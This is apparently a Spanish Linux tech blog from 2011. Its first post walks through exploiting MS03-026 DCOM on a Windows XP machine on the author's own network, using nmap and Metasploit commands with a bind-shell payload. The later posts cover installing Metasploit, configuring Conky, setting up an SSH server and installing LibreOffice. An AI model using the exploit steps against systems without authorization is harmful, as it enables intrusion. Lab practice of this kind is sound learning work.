miércoles, 30 de noviembre de 2011

Exploit DCOM en Windows XP

Bueno, en esta entrada vamos a usar Metasploit contra una máquina que esta en mi red y tiene Windows XP.

Primero, usamos nmap y vemos que puertos tiene abiertos.




Vemos que tiene el puerto 135, y Windows XP, así que el exploit a elegir será este: exploit/windows/dcerpc/ms03_026_dcom

Abrimos metasploit en la consola

$msfconsole
$use exploit/windows/dcerpc/ms03_026_dcom
$set TARGET 0
$show payloads
(Aquí elegimos el que queramos, yo he cogido generic/shell_bind_tcp)
$set PAYLOAD generic/shell_bind_tcp
$set RHOST 192.168.1.12
(Máquina remota a la que vamos a meter el exploit)
$exploit



Resultado:

Instalar Metasploit en Fedora

En esta entrada vamos a anotar como instalar esta poderosa herramienta, que es Metasploit.
Para quien no lo sepa, Metasploit es un proyecto open source de seguridad informática que nos da información sobre vulnerabilidades. También cuenta con numerosas herramientas y exploits para poder lanzarlos contra una máquina remota.

En primer lugar. Vamos a la web y descargamos el que nos corresponda.http://metasploit.com/download/
En mi caso he elegido el de 64 bits. (Ahora mismo estoy en Fedora 16 x86_64).

Una vez descargado metasploit-latest-linux-x64-installer.run

Vamos a instalarlo.
Primero instalamos ruby.

sudo yum install ruby

Damos permiso de ejecución al .run.

chmod +x metasploit-latest-linux-x64-installer.run
./metasploit-latest-linux-x64-installer.run


Seguimos los pasos en la ventana que se nos abrirá. Y una vez finalizado el proceso ya podemos poner en nuestro terminal: msfconsole
Y comenzar a usarlo :)

miércoles, 16 de noviembre de 2011

Configurar Conky

Conky es un monitor de sistema para Linux, FreeBSD y OpenBSD.Es altamente configurable, pudiendo monitorizar muchisimas variables del sistema, como pueden ser el estado de la CPU, memoria, swap, discos duros, archivos de log, mensajes del sistema, información de la bateria, etc. En esta dirección tenemos todas la variables http://conky.sourceforge.net/variables.html

Ahora vamos a empezar a instalar conky.

$ sudo yum install conky
$ sudo yum install sensors_lm


(instalamos sensors_lm para poder monitorizar la temperatura de la cpu)

Ahora debemos de crear un archivo de configuración de conky en nuestro home.

$ sudo nano .conkyrc

Ahora, cuando iniciemos conky, tomara los valores de este archivo.

En mi caso, este es mí archivo de configuración:

background yes
font Caliban:size=8
xftfont Caliban:size=8
use_xft yes
xftalpha 0.5
update_interval 1.0
total_run_times 0

own_window yes
own_window_type desktop
own_window_transparent yes
own_window_hints undecorated,below,sticky,skip_taskbar,skip_pager
double_buffer yes
#default_bar_size 500 700
draw_shades yes
draw_outline no
draw_borders no
draw_graph_borders no

minimum_size 1300 0
maximum_width 208

default_color ffffff
default_shade_color 000000

alignment bottom_right
gap_x 5
gap_y 130

no_buffers yes
cpu_avg_samples 2
override_utf8_locale yes
uppercase no
use_spacer none



TEXT

${color CC9900}SYSTEM ${hr 2}$color
${color #42AE4A}Kernel:${color #CED7EB}$kernel
${color #42AE4A}UpTime: ${color #CED7EB}$uptime

${color #42AE4A}CPU Temperature: ${color #CED7EB} ${exec sensors | grep -i 'CPU TEMPERATURE'| awk '{print $3}'}
${color #42AE4A}Core0:${color #CED7EB} ${freq_g 1} Ghz ${color #42AE4A} Temp: ${color #CED7EB} ${exec sensors | grep 'Core0'|awk '{print $3}'}
${cpu cpu1}% ${color 597DB2}${cpubar cpu1}$color
${color #42AE4A}Core1:${color #CED7EB} ${freq_g 2} Ghz ${color #42AE4A} Temp: ${color #CED7EB} ${exec sensors | grep 'Core1'|awk '{print $3}'}
${cpu cpu2}% ${color 597DB2}${cpubar cpu2}$color

${color slate grey}Processes: ${color #CED7EB}$processes ${color slate grey}Running: ${color #CED7EB}$running_processes

${color CC9900}TOP PROCESSES ${hr 2}$color
${color #42AE4A}Name PID CPU MEM
${color #CED7EB}${top name 1} ${alignr} ${top pid 1} ${top cpu 1} ${top mem 1}
${top name 2} ${alignr} ${top pid 2} ${top cpu 2} ${top mem 2}
${top name 3} ${alignr} ${top pid 3} ${top cpu 3} ${top mem 3}
${color #42AE4A}Mem Usage
${color #CED7EB}${top_mem name 1} ${alignr} ${top_mem pid 1} ${top_mem cpu 1} ${top_mem mem 1}
${top_mem name 2} ${alignr} ${top_mem pid 2} ${top_mem cpu 2} ${top_mem mem 2}
${top_mem name 3} ${alignr} ${top_mem pid 3} ${top_mem cpu 3} ${top_mem mem 3}

${color CC9900}MEMORY ${hr 2}$color
${color #42AE4A}MEM: ${color #CED7EB} $memperc% $mem/$memmax
${color 597DB2}${membar }
${color #42AE4A}SWAP: ${color #CED7EB}$swapperc% $swap/$swapmax
${color 597DB2}${swapbar }

${color CC9900}DISK ${hr 2}$color
${color #42AE4A}ROOT: ${color #CED7EB}${fs_used /}/${fs_size /}
${color 597DB2}${fs_bar /}
${color #42AE4A}HOME: ${color #CED7EB}${fs_used /home}/${fs_size /home}
${color 597DB2}${fs_bar /home}
${color #42AE4A}OTRO: ${color #CED7EB}${fs_used /media/K:}/${fs_size /media/K:}
${color 597DB2}${fs_bar /media/K:}


${color CC9900}NETWORK ${hr 2}$color
${color #42AE4A}Local IP: ${color #CED7EB}${addr eth0}
${color #42AE4A}Public IP:${color #CED7EB} ${execi 3600 wget -q -O - checkip.dyndns.org|sed -e 's/.*Current IP Address: //' -e 's/<.*$//'}
${color #42AE4A}Uploaded: ${color #CED7EB}${totalup eth0}
${color #42AE4A}Downloaded: ${color #CED7EB}${totaldown eth0}




Por cierto, cuando modifiqueis mucho el .conkyrc, si mirais el uso de la memoria, conky estara consumiendo bastante más de lo que suele usar, así que podeis finalizar el proceso, y luego volver a iniciarlo, y vereis como os consume muchisimo menos. (Esa configuración consume 1mb aprox.)

miércoles, 9 de noviembre de 2011

Servidor SSH en Linux

SSH (Secure SHell) es una shell (intérprete de comandos) seguro, sirve para acceder a máquinas remotas a través de una red, y podemos controlar estas desde el terminal. SSH trabaja de forma similar a telnet. La diferencia es que SSH usa técnicas de cifrado que hacen que la información vaya de manera no legible.

En Fedora viene instalado por defecto en servidor, pero si no lo teneis en vuestra distrubición, solo teneis que descargar openssh-server desde vuestro gestor de descarga.


(Ejecutar estas instrucciones logeados como root o bien con sudo)
Para iniciarlo
$ /etc/init.d/sshd start
o
$ service sshd start
Para pararlo
$ service sshd stop
Para reiniciarlo
$ service sshd restart
Y para ver su estado
$ service sshd status

Para configurarlo tenemos que abrir:
$ nano /etc/ssh/sshd_config

Como recomendación yo cambiaría el puerto 22 por cualquier otro puerto, por ejemplo 4450 Port 4450, el protocolo lo ponemos en 2, Protocol 2, y que no se pueda entrar como root. PermitRootLogin no

Todo eso dentro del archivo de configuración sshd_config
Ahora solo tenemos que abrir en el router el puerto que hemos puesto para el servidor ssh, en nuestro caso es el 4450.

reiniciamos el servidor
$ service sshd restart

y probamos a conectarnos:
$ ssh user@127.0.0.1 -p 4450
o en mi caso también con:
$ ssh user@192.168.1.10 -p 4450

Si queremos conectarnos desde otra máquina fuera de nuestra red local, solo tenemos que poner
$ ssh user@ip.publica -p 4450

Si tenemos una ip dinámica es conveniente que nos registremos en y pongamos un DNS a nuestra ip, luego entramos al router por telnet o web, y desde ahí podemos poner el DNS dinámico, así cada vez que encendamos el router, aunque tengamos una ip distinta, tendremos el nombre de dominio que nos hemos puesto en dyndns, y nos podremos conectar desde otra máquina de esta forma, sin tener que preocuparnos en mirar nuestra ip, que cada vez que apagemos y encendamos el router sera distinta:
$ ssh user@perroscallejeros.dyndns.org

donde user, sera un usuario de la máquina.

Si queremos que el servidor se arranque automaticamente cuando arranquemos el SO.

$ sudo chkconfig sshd on

miércoles, 2 de noviembre de 2011

LibreOffice en Fedora 15

En esta entrada vamos a instalar esta suite de ofimática libre y gratuita que es LibreOffice (bifurcación de OpenOffice.org cuando Oracle compro Sun Microsystems, desarrolladores de OpenOffice.org).

En primer lugar, vamos a bajarlo de: http://www.libreoffice.org/download
Como vemos, el archivo descargado tiene de extension *.tar.gz

La extensión .tar se usa mucho en sistemas UNIX, para almacenar archivos y directorios en un solo archivo, lo cual es bastante útil, pero sin comprimir estos archivos. Sin embargo cuando la extensión es .tar.gz, quiere decir que esta comprimido con gzip.

Una vez descargado, vamos a proceder a descomprimirlo e instalarlo posteriormente.

Ahora vamos a la carpeta donde lo tenemos guardado, en mi caso es Descargas
$ cd Descargas/
Para descomprimirlo, usamos:
$ tar -xzvf LibO_3.4.3_Linux_x86_install-rpm_en-US.tar.gz
Una vez descomprimido, vamos a la carpeta donde estan los archivos:
$ cd LibO_3.4.3_Linux_x86_install-rpm_en-US.tar.gz
(En la cual hay dos carpetas, readme y RPMS). En RPMS estan los archivos que debemos instalar.
$ sudo rpm -Uvh RPMS/*.rpm

$ sudo rpm -ivh RPMS/desktop-integration/libreoffice3.4-redhat-menus-3.4-302.noarch.rpm

Ahora ya nos sale LibreOffice en el menú. (La primera vez me salia que no tenia JRE de java instalado, si no lo teneis, debeis instalarlo.)

Ahora bajamos de la misma web de antes, los paquetes de idiomas y descomprimimos e instalamos igual que antes:


$ tar -xzvf LibO_3.4.3_Linux_x86_langpack-rpm_es.tar.gz
$ cd LibO_3.4.3rc2_Linux_x86_langpack-rpm_es
$ sudo rpm -ivh RPMS/*.rpm
$ cd ..
$ tar -xzvf LibO_3.4.3_Linux_x86_helppack-rpm_es.tar.gz
$ cd LibO_3.4.3rc2_Linux_x86_helppack-rpm_es
$ sudo rpm -ivh RPMS/*.rpm



PD: Si al instalar los paquetes de idiomas os da algún fallo, os recomiendo que los instaleis uno a uno (no son muchos), yendo a la carpeta donde estan los RPMs y usando la sintaxis:
$ sudo rpm -Uvh paquete.rpm